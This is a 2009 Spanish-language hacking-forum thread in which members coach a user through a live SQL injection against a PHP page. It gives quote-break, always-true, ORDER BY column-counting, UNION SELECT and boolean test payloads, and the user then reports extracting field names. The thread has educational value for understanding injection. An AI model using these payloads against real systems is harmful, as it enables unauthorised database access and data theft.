elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Una duda de SQL injection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Una duda de SQL injection  (Leído 5,730 veces)
baZZ

Desconectado Desconectado

Mensajes: 168



Ver Perfil
Una duda de SQL injection
« en: 29 Mayo 2009, 03:42 am »

Buenas pues mi pregunta es, ¿se puede hacer una inyeccion sql a una variable a la que se le pasa mysql_real_escape_string()? ¿Ejemplos? Gracias
En línea

- EVGA ATX - Intel X58
- i7 920 @ 3,2 Ghz
- 2x260 gtx 216 SLI
- 3x1 GB OCZ DIMM DDR3 1600 Mhz
- Tacens Sagitta II
- Seagate 7200.12
Falta:
- T.R.U.E ^^
- i7 @ 4,0 Ghz
HardieVon

Desconectado Desconectado

Mensajes: 181


Programming HardCore


Ver Perfil WWW
Re: Una duda de SQL injection
« Respuesta #1 en: 4 Junio 2009, 08:52 am »

claro que si

$consulta = "SELECT * FROM usuarios WHERE id=$_GET['id'] ORDER BY 7";

?id=-1 UNION 1,2,3,4,5,6,7 FROM...

no veo que uses caracteres especiales
En línea

baZZ

Desconectado Desconectado

Mensajes: 168



Ver Perfil
Re: Una duda de SQL injection
« Respuesta #2 en: 15 Junio 2009, 01:29 am »

tengo lo siguiente:

prueba.php?=Pedro

Entonces esto me muestra los datos del usuario Pedro.
Si hago lo siguiente:

prueba.php?='

Me muestra esto:
Execute query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Sigo investigando y si hago esto:
prueba.php?=x' or 'x' = 'x

Y efectivamente me muestra el primer usuario que coge de la tabla.
Digamos que conozco mas o menos los nombres de las tablas y campos de la BD, ¿puedo explotarlo más?
En línea

- EVGA ATX - Intel X58
- i7 920 @ 3,2 Ghz
- 2x260 gtx 216 SLI
- 3x1 GB OCZ DIMM DDR3 1600 Mhz
- Tacens Sagitta II
- Seagate 7200.12
Falta:
- T.R.U.E ^^
- i7 @ 4,0 Ghz
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: Una duda de SQL injection
« Respuesta #3 en: 15 Junio 2009, 02:13 am »

union select ?
order by ?

me confundi
(?
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Una duda de SQL injection
« Respuesta #4 en: 15 Junio 2009, 03:00 am »

prueba.php?=Pedro' order by 999 --
Si no resulta es porque procesa carácteres codificados por utf-8:
prueba.php?=Pedro' USING utf8) order by 999 --

Si te funciona después pruebas con order by 10, si te da error es porque es mas de 10 y menos de 999, cuando da error es porque el número debe ser superior (ese número te indica la cantidad de columnas de la tabla).
Cuando order by 15 te de error y el 16 no te de error entonces haces un union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 --
No es necesario que uses números coorelativos, es solo para poder visualizar que tabla se imprime en la página y poder hacer devolver datos desde otras tablas.
En línea

OzX


Desconectado Desconectado

Mensajes: 406

[NuKe] Team


Ver Perfil WWW
Re: Una duda de SQL injection
« Respuesta #5 en: 15 Junio 2009, 04:15 am »

Hi Bro
Prueba esto

prueba.php?=Pedro'+and+1=0+--+
prueba.php?=Pedro'+and+1=1+--+

Te muestra un Resultado Verdadero o Falso?
Osea cuando haces
prueba.php?=Pedro'+and+1=1+--+
Te muestra lo Mismo que si haces.
prueba.php?=Pedro
?
Es Probable que Sean Las Magic Quotes Del Php.
Saludos
Oz¡
En línea

Undersecurity.net
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Una duda de SQL injection
« Respuesta #6 en: 15 Junio 2009, 06:44 am »

Hi Bro
Prueba esto

prueba.php?=Pedro'+and+1=0+--+
prueba.php?=Pedro'+and+1=1+--+

Te muestra un Resultado Verdadero o Falso?
Osea cuando haces
prueba.php?=Pedro'+and+1=1+--+
Te muestra lo Mismo que si haces.
prueba.php?=Pedro
?
Es Probable que Sean Las Magic Quotes Del Php.
Saludos
Oz¡

Citar
prueba.php?='

Me muestra esto:
Execute query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Sigo investigando y si hago esto:
prueba.php?=x' or 'x' = 'x

Y efectivamente me muestra el primer usuario que coge de la tabla.
Digamos que conozco mas o menos los nombres de las tablas y campos de la BD, ¿puedo explotarlo más?

Si tuviera magic quotes activado entonces la comilla hubiera sido parte de la query y no le hubiera dado error de sintaxis ya que debería haber debuelto que el valor era nulo, además dice que
Citar
Sigo investigando y si hago esto:
prueba.php?=x' or 'x' = 'x
Y efectivamente me muestra el primer usuario que coge de la tabla.

Significa que si pudo inyectar código, solo que ahora necesita saber cuantas columnas contiene la tabla para poder hacer la ubnion y lanzar las demás sentencias.

Saludos.
En línea

baZZ

Desconectado Desconectado

Mensajes: 168



Ver Perfil
Re: Una duda de SQL injection
« Respuesta #7 en: 16 Junio 2009, 00:10 am »

Ya pude inyectar, conseguir el numero de campos e incluso algunos nombres de campos lo cual me dio bastante info. Gracias a todos
En línea

- EVGA ATX - Intel X58
- i7 920 @ 3,2 Ghz
- 2x260 gtx 216 SLI
- 3x1 GB OCZ DIMM DDR3 1600 Mhz
- Tacens Sagitta II
- Seagate 7200.12
Falta:
- T.R.U.E ^^
- i7 @ 4,0 Ghz
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
(DUDA) Haciendo SQL Injection. « 1 2 »
Nivel Web
flowskull 16 9,876 Último mensaje 1 Abril 2012, 23:57 pm
por afdlkglfgfdgfhgf
Duda con Sql Injection en Sql Map
Nivel Web
Blackhawk222 3 3,213 Último mensaje 14 Febrero 2012, 11:24 am
por cibergolen
Duda sobre sql injection
Nivel Web
Mapcimus 2 3,288 Último mensaje 20 Julio 2013, 02:42 am
por Mapcimus
Xss injection & sql injection pequeña duda.
Nivel Web
6666 6 3,863 Último mensaje 12 Septiembre 2014, 07:27 am
por 6666
Duda sobre SQL injection
Seguridad
JoseGutrz 5 3,223 Último mensaje 15 Abril 2017, 06:51 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines